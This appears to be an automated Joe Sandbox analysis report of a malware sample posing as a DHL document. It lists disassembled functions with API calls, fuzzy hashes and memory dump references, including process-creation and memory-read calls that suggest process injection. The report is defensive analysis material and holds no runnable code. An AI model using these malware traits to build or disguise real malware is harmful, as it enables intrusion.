Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: e37fa7fb460d0fe1c0ea96c1dc691a4beeb7286444ca8b5118738a1c4f1c9c63
Instruction ID: a20462432bb7541d10fa324a80ef9fb368d1fa2290c9d3d3d48bf82ebd684fc9
Opcode Fuzzy Hash: e37fa7fb460d0fe1c0ea96c1dc691a4beeb7286444ca8b5118738a1c4f1c9c63
Instruction Fuzzy Hash: DE127B719083419FC714DF29C584B6ABBE1FF88318F04895DE8998B392DB35ED45CB92

Function 00A610F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A61BF4
Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A61BFC
Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A61C07
Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A61C12
Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A61C1A
Part of subcall function 00A61BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A61C22

Part of subcall function 00A61B4A: RegisterWindowMessageW.USER32(00000004,?,00A612C4), ref: 00A61BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A6136A
OleInitialize.OLE32 ref: 00A61388
CloseHandle.KERNEL32(00000000,00000000), ref: 00AA24AB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: c269e1aad001dc834bcf9b8600c3f5adab7506203e57536353d4a1a480c12c0b
Instruction ID: 0df350b256ee2f8fe969942be71a7d03655c2bc4e935594e4f835566bca56b58
Opcode Fuzzy Hash: c269e1aad001dc834bcf9b8600c3f5adab7506203e57536353d4a1a480c12c0b
Instruction Fuzzy Hash: C371ACB69012048FC384DFBEAA4566D3AECFBA83547368E2AE54AC7361EF304405CF54

Function 00A986AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00A985CC,?,00B28CC8,0000000C), ref: 00A98704
GetLastError.KERNEL32(?,00A985CC,?,00B28CC8,0000000C), ref: 00A9870E
__dosmaperr.LIBCMT ref: 00A98739

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 37647f6045172e6ade2b282b9ff08cfc885a20636c0c6c5af9b712be9c33b833
Instruction ID: 4ad9ea9b74d8b72defdd28b776013622ff932cd3d95433cfbd25a5c0117d29f3
Opcode Fuzzy Hash: 37647f6045172e6ade2b282b9ff08cfc885a20636c0c6c5af9b712be9c33b833
Instruction Fuzzy Hash: 8C012B33B0562016DE256374A946B7F77D94B93774F390219FA148F1D2DEA88C81D290

Function 00A71310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A717F6

Strings

CALL, xrefs: 00A717C6

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 6f58d8150435882ee79198b742328aa3424316b757a080892a0c1cbe3cb0fee1
Instruction ID: c31fd2bde1276cbbd5b4ae8dde68a1072bef9d2e5c3d293bd32957cceb0dac80
Opcode Fuzzy Hash: 6f58d8150435882ee79198b742328aa3424316b757a080892a0c1cbe3cb0fee1
Instruction Fuzzy Hash: 93228B706083019FC714DF18C990A6ABBF5BF85314F24C96DF49A8B362D735E945CB92

Function 00A62DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00AA2C8C

Part of subcall function 00A63AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A63A97,?,?,00A62E7F,?,?,?,00000000), ref: 00A63AC2

Part of subcall function 00A62DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A62DC4

Strings

X, xrefs: 00AA2C5A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: ae408379b0e6056e05b5697a10fa8e0489a614c723a7827a22b05f6d2a0a872c
Instruction ID: 844161401ef214e17979a7ff7faedfeb31c0ecb40bea06ba1ed29a80c27c84eb
Opcode Fuzzy Hash: ae408379b0e6056e05b5697a10fa8e0489a614c723a7827a22b05f6d2a0a872c
Instruction Fuzzy Hash: 8E21A571A00298AFDF01EF94D945BEE7BFCAF49314F008059E405A7281DBB45A898F61

Function 00A63837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63908

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: f5c6ddbfa786bf7141768e1f9b9fa2cb209e7979c5d423cabb41275da60d6e89
Instruction ID: 230c8338ded9af4f42e318b4f2d24ee6d769aa4a47f1f81f2c2646950bcc6e90
Opcode Fuzzy Hash: f5c6ddbfa786bf7141768e1f9b9fa2cb209e7979c5d423cabb41275da60d6e89
Instruction Fuzzy Hash: AC31C3725043009FDB20DF68D9847EBBBF8FB49708F10092EF59A87240E771AA44CB52

Function 00A65745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A6949C,?,00008000), ref: 00A65773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00A6949C,?,00008000), ref: 00AA4052

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 21ec63830070a8addaaeca58253945c0ecca2f0bf6c4a8fed8454dafbfda0249
Instruction ID: 9648d2f28e06fec5c7322fda850f0b392daa9456072b76ff2c804688e872429b
Opcode Fuzzy Hash: 21ec63830070a8addaaeca58253945c0ecca2f0bf6c4a8fed8454dafbfda0249
Instruction Fuzzy Hash: C2019230545225B6E3314B6ACD0EF977FA8EF067B0F108300BA9C6A1E0CBB45855CB90

Function 00A6B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A6BB4E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: cbeddd5d62fad3e18dc7cea14b628ddc142ec637217fb13c2e2b02c38fe23550
Instruction ID: fb6f07bfbf1c74c3f8a158a001321b45d23298056e32329ac02387677dc42727
Opcode Fuzzy Hash: cbeddd5d62fad3e18dc7cea14b628ddc142ec637217fb13c2e2b02c38fe23550
Instruction Fuzzy Hash: A332BC35A00209EFDB24CF58C994EBEB7F9EF44310F258059E905AB262D774ED81CBA1

Function 0168D965 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0168E123
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0168E1B9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0168E1DB

Memory Dump Source

Source File: 00000000.00000002.1422791502.000000000168C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0168C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168c000_DHL 745-12302024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction ID: 22e81a9b55dfe81fb414af557a4dba66ce091b9a098f07d45314f311ae1a581c
Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction Fuzzy Hash: 9A12DF24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A

Function 00AE709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: e6789f82dd80315f9dbc1aa5a071aafcbd52831686ec484200ecf4649c093b34
Instruction ID: 4bf29adefd67600ebb338d9278b72928d7aa23003fce5e5ed5fca85268d22f82
Opcode Fuzzy Hash: e6789f82dd80315f9dbc1aa5a071aafcbd52831686ec484200ecf4649c093b34
Instruction Fuzzy Hash: E1D17F34A0424ADFCF14EF99C9819ADBBB5FF58310F14815AE915AB391DB30AD81CF91

Function 00A7FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A7FD1F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: fcda934c619c0a9e705eb3d3d3547247949755de7f5fc9dce51b1346237417f0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7531CF75A001099FD729CF59D880969FBB6FB49314B24C6A5E809CB656D731EEC1CBC0

Function 00A64ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A64E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A64EDD,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E9C
Part of subcall function 00A64E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A64EAE
Part of subcall function 00A64E90: FreeLibrary.KERNEL32(00000000,?,?,00A64EDD,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64EFD

Part of subcall function 00A64E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA3CDE,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E62
Part of subcall function 00A64E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A64E74
Part of subcall function 00A64E59: FreeLibrary.KERNEL32(00000000,?,?,00AA3CDE,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E87

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: ba6f325466851fe759dc177e1d4f6df7e4b6bb7300c3ee9c8555776311e24783
Instruction ID: 7a72d0877b2b40838a2afdb2d5ccedbf4f4528454830caddc99b34d31e571900
Opcode Fuzzy Hash: ba6f325466851fe759dc177e1d4f6df7e4b6bb7300c3ee9c8555776311e24783
Instruction Fuzzy Hash: 7C11C132600205AACF19FFA0DE02BAD77B5AF48B10F20842AF542A61C1EE719A059790

Function 00A98402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00A98440

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 0f2f7502fd105f1ef4511b671e165d29417c38bdb83ff1411aab9e699ed646d1
Instruction ID: 9854cf5e5ddc31859e510b3dd0b322a557903a0e9802789fe7923ab843b0728e
Opcode Fuzzy Hash: 0f2f7502fd105f1ef4511b671e165d29417c38bdb83ff1411aab9e699ed646d1
Instruction Fuzzy Hash: 68111875A0410AAFCF05DF58E94199F7BF5EF49314F104069F808AB312DB31DA11CBA5

Function 00A95000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A94C7D: RtlAllocateHeap.NTDLL(00000008,00A61129,00000000,?,00A92E29,00000001,00000364,?,?,?,00A8F2DE,00A93863,00B31444,?,00A7FDF5,?), ref: 00A94CBE

_free.LIBCMT ref: 00A9506C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 8d560a8f9dff3b4cf10bbee5f8261c03d677efe1b66d764ea1a8637f7e0b6098
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: D4012B727047056FEB228F65D842A5AFBE8FB89370F25062DE18483280EA306905C7B4

Function 00A8E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: e3e47c8d38f33b2c10e512962fac5f14c57b8a01d6f29e9dc1e43deb94b4094d
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 9AF02832611A14EADB317B798E05B5A37D89F52330F140735F424931E2EB74D80287A5

Function 00A69CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A69CBD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: daa1ec522d7e5d217855691e78f7439a1b365263ee3c5ae7c9657e0e4f3ea7de
Instruction ID: 7da79ffb0dc0756b084cd6eb1d0db9589313b1c934b7efa5ff746044423ea4e9
Opcode Fuzzy Hash: daa1ec522d7e5d217855691e78f7439a1b365263ee3c5ae7c9657e0e4f3ea7de
Instruction Fuzzy Hash: FFF0A4B26016016ED7249F28DC06A67BBA8EB44760F10C52AF619CB1D1DB31E51487A0

Function 00A94C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00A61129,00000000,?,00A92E29,00000001,00000364,?,?,?,00A8F2DE,00A93863,00B31444,?,00A7FDF5,?), ref: 00A94CBE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0721d551544c47a245161ca3950a62ba6d65be694ab98cc6b3b4b6ea311ff07d
Instruction ID: e4600583404380c1e31f280997053fe40eb9e3b18660df5784a5753ad8ae4330
Opcode Fuzzy Hash: 0721d551544c47a245161ca3950a62ba6d65be694ab98cc6b3b4b6ea311ff07d
Instruction Fuzzy Hash: 23F0B4317062256EDF216F629D05F9A37D8BF497A1B144615B815A6180CA30D80286A0

Function 00A93820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6,?,00A61129), ref: 00A93852

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 30f230cdccce149d3797b423df3b75487228658d12fbb3b6450e67e29a7a8657
Instruction ID: 83667e8243840168bad00af0c5747b4923d2fb0fdb7921a32d5336129902d5e9
Opcode Fuzzy Hash: 30f230cdccce149d3797b423df3b75487228658d12fbb3b6450e67e29a7a8657
Instruction Fuzzy Hash: D2E0E53730222566DF213BBB9D04BDA36FDAF427B0F158161BC0592880DB20DD0192E0

Function 00A64F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64F6D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9e67088e6e2ac1558a13387307e78b42da1a2eb6bbeb123f14e62280a9200b3a
Instruction ID: b9b22990f1f138102a19f365280c8295c1d2b349f228e4f8dda3f5a1f34872d1
Opcode Fuzzy Hash: 9e67088e6e2ac1558a13387307e78b42da1a2eb6bbeb123f14e62280a9200b3a
Instruction Fuzzy Hash: D4F06571105751CFDB389F64D590822B7F5FF187293108A7EE2DA83511C7319844DF10

Function 00ACCCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

